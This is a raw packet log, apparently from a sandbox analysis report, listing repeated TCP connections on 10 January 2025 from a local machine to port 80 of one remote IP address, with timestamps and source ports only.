              Jan 10, 2025 08:59:27.400214911 CET4975480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:27.400490046 CET4975480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:27.405188084 CET8049754166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:28.327038050 CET8049754166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:28.327250957 CET8049754166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:28.327358961 CET4975480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:28.327645063 CET4975480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:28.332534075 CET8049754166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:28.496134043 CET4975580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:28.501291990 CET8049755166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:28.501451969 CET4975580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:28.501621008 CET4975580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:28.504400015 CET4975680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:28.506545067 CET8049755166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:28.506624937 CET4975580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:28.509255886 CET8049756166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:28.509351969 CET4975680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:28.509505033 CET4975680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:28.514727116 CET8049756166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:29.414518118 CET8049756166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:29.414578915 CET8049756166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:29.414704084 CET4975680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:29.414793015 CET4975680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:29.419771910 CET8049756166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:29.573132992 CET4975880192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:29.578702927 CET8049758166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:29.578931093 CET4975880192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:29.599260092 CET4975880192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:29.605102062 CET8049758166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:29.605228901 CET4975880192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:29.608093023 CET4975980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:29.613676071 CET8049759166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:29.613827944 CET4975980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:29.620853901 CET4975980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:29.626498938 CET8049759166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:30.535300970 CET8049759166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:30.535393953 CET8049759166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:30.535502911 CET4975980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:30.535599947 CET4975980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:30.540508986 CET8049759166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:30.680259943 CET4976080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:30.685178041 CET8049760166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:30.685275078 CET4976080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:30.685444117 CET4976080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:30.688024044 CET4976180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:30.690382004 CET8049760166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:30.690452099 CET4976080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:30.692874908 CET8049761166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:30.692964077 CET4976180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:30.693134069 CET4976180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:30.698014021 CET8049761166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:31.611861944 CET8049761166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:31.612157106 CET8049761166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:31.612261057 CET4976180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:31.612261057 CET4976180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:31.617141008 CET8049761166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:31.760806084 CET4976280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:31.765746117 CET8049762166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:31.765846968 CET4976280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:31.765976906 CET4976280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:31.768572092 CET4976380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:31.770894051 CET8049762166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:31.770953894 CET4976280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:31.773416042 CET8049763166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:31.773480892 CET4976380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:31.773597956 CET4976380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:31.778434992 CET8049763166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:32.711414099 CET8049763166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:32.711477041 CET8049763166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:32.711637974 CET4976380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:32.713886976 CET4976380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:32.718713045 CET8049763166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:32.855375051 CET4976480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:32.861694098 CET8049764166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:32.861776114 CET4976480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:32.862011909 CET4976480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:32.864200115 CET4976580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:32.868776083 CET8049764166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:32.868833065 CET4976480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:32.871058941 CET8049765166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:32.871138096 CET4976580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:32.871587992 CET4976580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:32.878452063 CET8049765166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:33.779359102 CET8049765166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:33.779485941 CET8049765166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:33.779542923 CET4976580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:33.779627085 CET4976580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:33.784492016 CET8049765166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:33.908114910 CET4976680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:33.913131952 CET8049766166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:33.913361073 CET4976680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:33.913361073 CET4976680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:33.915070057 CET4976780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:33.918376923 CET8049766166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:33.918452978 CET4976680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:33.919966936 CET8049767166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:33.920038939 CET4976780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:33.920243025 CET4976780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:33.925132036 CET8049767166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:34.882731915 CET8049767166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:34.883143902 CET8049767166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:34.883198023 CET4976780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:34.888987064 CET4976780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:34.893944979 CET8049767166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:35.032440901 CET4976980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:35.037400961 CET8049769166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:35.037478924 CET4976980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:35.037672997 CET4976980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:35.039938927 CET4977080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:35.042593956 CET8049769166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:35.042649031 CET4976980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:35.044841051 CET8049770166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:35.044928074 CET4977080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:35.045032024 CET4977080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:35.049865961 CET8049770166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:35.969995975 CET8049770166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:35.970118046 CET8049770166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:35.970185041 CET4977080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:35.970269918 CET4977080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:35.975131989 CET8049770166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:36.095944881 CET4977180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:36.101073027 CET8049771166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:36.101187944 CET4977180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:36.101339102 CET4977180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:36.106339931 CET8049771166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:36.106408119 CET4977180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:36.125662088 CET4977280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:36.130492926 CET8049772166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:36.130597115 CET4977280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:36.130758047 CET4977280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:36.135561943 CET8049772166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:37.051531076 CET8049772166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:37.051774025 CET8049772166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:37.051853895 CET4977280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:37.052009106 CET4977280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:37.057748079 CET8049772166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:37.183264017 CET4977380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:37.188167095 CET8049773166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:37.188373089 CET4977380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:37.188474894 CET4977380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:37.190498114 CET4977480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:37.193341970 CET8049773166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:37.193408012 CET4977380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:37.195303917 CET8049774166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:37.195390940 CET4977480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:37.195750952 CET4977480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:37.200556993 CET8049774166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:38.143450022 CET8049774166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:38.143959045 CET8049774166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:38.144165039 CET4977480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:38.144165993 CET4977480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:38.149570942 CET8049774166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:38.282377005 CET4977680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:38.287457943 CET8049776166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:38.287703991 CET4977680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:38.287864923 CET4977680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:38.290361881 CET4977780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:38.292819023 CET8049776166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:38.292889118 CET4977680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:38.295281887 CET8049777166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:38.295469999 CET4977780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:38.295550108 CET4977780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:38.300478935 CET8049777166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:39.232263088 CET8049777166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:39.232682943 CET8049777166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:39.232762098 CET4977780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:39.232948065 CET4977780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:39.237848997 CET8049777166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:39.374747992 CET4978680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:39.379668951 CET8049786166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:39.379759073 CET4978680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:39.379914045 CET4978680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:39.382334948 CET4978780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:39.384764910 CET8049786166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:39.384834051 CET4978680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:39.387300014 CET8049787166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:39.387450933 CET4978780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:39.387639046 CET4978780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:39.392535925 CET8049787166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:40.314548016 CET8049787166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:40.314907074 CET8049787166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:40.314971924 CET4978780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:40.315006971 CET4978780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:40.319881916 CET8049787166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:40.442383051 CET4979580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:40.447238922 CET8049795166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:40.447360992 CET4979580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:40.447509050 CET4979580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:40.452488899 CET8049795166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:40.452533960 CET4979580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:40.471227884 CET4979680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:40.476058006 CET8049796166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:40.476125002 CET4979680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:40.476210117 CET4979680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:40.480984926 CET8049796166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:41.376718998 CET8049796166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:41.376763105 CET8049796166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:41.377156019 CET4979680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:41.377408028 CET4979680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:41.382297993 CET8049796166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:41.518536091 CET4980280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:41.523539066 CET8049802166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:41.523627043 CET4980280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:41.523750067 CET4980280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:41.526150942 CET4980380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:41.528712988 CET8049802166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:41.528776884 CET4980280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:41.531028032 CET8049803166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:41.531088114 CET4980380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:41.531194925 CET4980380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:41.536011934 CET8049803166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:42.451180935 CET8049803166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:42.451730013 CET8049803166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:42.451807976 CET4980380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:42.454595089 CET4980380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:42.459439039 CET8049803166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:42.591245890 CET4981480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:42.596218109 CET8049814166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:42.597306013 CET4981480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:42.598483086 CET4981480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:42.603394032 CET8049814166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:42.603471041 CET4981480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:42.603908062 CET4981580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:42.608822107 CET8049815166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:42.608906031 CET4981580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:42.609934092 CET4981580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:42.614716053 CET8049815166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:43.526401997 CET8049815166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:43.526887894 CET8049815166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:43.526983023 CET4981580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:43.527445078 CET4981580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:43.532387018 CET8049815166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:43.654165030 CET4982180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:43.659173965 CET8049821166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:43.659250975 CET4982180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:43.659373045 CET4982180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:43.661230087 CET4982280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:43.664366007 CET8049821166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:43.666193008 CET8049822166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:43.666295052 CET4982280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:43.666394949 CET4982280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:43.666400909 CET4982180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:43.671231985 CET8049822166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:44.599970102 CET8049822166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:44.600116968 CET8049822166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:44.600181103 CET4982280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:44.600274086 CET4982280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:44.605046988 CET8049822166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:44.727484941 CET4982980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:44.732388973 CET8049829166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:44.732453108 CET4982980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:44.732587099 CET4982980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:44.734299898 CET4983180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:44.737482071 CET8049829166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:44.737555027 CET4982980192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:44.739115000 CET8049831166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:44.739193916 CET4983180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:44.739330053 CET4983180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:44.744225025 CET8049831166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:45.662324905 CET8049831166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:45.662525892 CET8049831166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:45.662584066 CET4983180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:45.662684917 CET4983180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:45.667525053 CET8049831166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:45.789253950 CET4984080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:45.794986010 CET8049840166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:45.795079947 CET4984080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:45.795224905 CET4984080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:45.797058105 CET4984180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:45.800816059 CET8049840166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:45.800883055 CET4984080192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:45.801956892 CET8049841166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:45.802026033 CET4984180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:45.802113056 CET4984180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:45.806864023 CET8049841166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:46.733742952 CET8049841166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:46.734123945 CET8049841166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:46.734201908 CET4984180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:46.734271049 CET4984180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:46.739073992 CET8049841166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:46.863362074 CET4984680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:46.868231058 CET8049846166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:46.868299007 CET4984680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:46.868387938 CET4984680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:46.873393059 CET8049846166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:46.873442888 CET4984680192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:46.893224001 CET4984780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:46.898103952 CET8049847166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:46.898188114 CET4984780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:46.898849010 CET4984780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:46.903728962 CET8049847166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:47.802615881 CET8049847166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:47.802870035 CET8049847166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:47.803483963 CET4984780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:47.803546906 CET4984780192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:47.808413982 CET8049847166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:47.941131115 CET4985480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:47.946209908 CET8049854166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:47.946309090 CET4985480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:47.946441889 CET4985480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:47.948734045 CET4985580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:47.951378107 CET8049854166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:47.951445103 CET4985480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:47.953588963 CET8049855166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:47.953666925 CET4985580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:47.953768015 CET4985580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:47.959094048 CET8049855166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:48.886893034 CET8049855166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:48.887109995 CET8049855166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:48.887326956 CET4985580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:48.887326956 CET4985580192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:48.892322063 CET8049855166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:49.013771057 CET4986280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:49.018821001 CET8049862166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:49.018914938 CET4986280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:49.019107103 CET4986280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:49.021204948 CET4986380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:49.024069071 CET8049862166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:49.024255991 CET4986280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:49.026108027 CET8049863166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:49.026216030 CET4986380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:49.026380062 CET4986380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:49.031254053 CET8049863166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:49.953263998 CET8049863166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:49.953603983 CET8049863166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:49.953699112 CET4986380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:49.953799963 CET4986380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:49.958628893 CET8049863166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:50.102443933 CET4987180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:50.107444048 CET8049871166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:50.107527018 CET4987180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:50.107640982 CET4987180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:50.110539913 CET4987280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:50.112576962 CET8049871166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:50.112649918 CET4987180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:50.115405083 CET8049872166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:50.115478992 CET4987280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:50.115751028 CET4987280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:50.120529890 CET8049872166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:51.061712027 CET8049872166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:51.061755896 CET8049872166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:51.061816931 CET4987280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:51.062005997 CET4987280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:51.066855907 CET8049872166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:51.190443039 CET4988180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:51.195837021 CET8049881166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:51.196005106 CET4988180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:51.196187973 CET4988180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:51.198301077 CET4988280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:51.201158047 CET8049881166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:51.201220989 CET4988180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:51.203244925 CET8049882166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:51.203341007 CET4988280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:51.203576088 CET4988280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:51.208394051 CET8049882166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:52.122479916 CET8049882166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:52.122814894 CET8049882166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:52.122908115 CET4988280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:52.122908115 CET4988280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:52.127856970 CET8049882166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:52.252088070 CET4988880192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:52.257047892 CET8049888166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:52.257173061 CET4988880192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:52.257230997 CET4988880192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:52.259258032 CET4988980192.168.2.4166.62.27.188
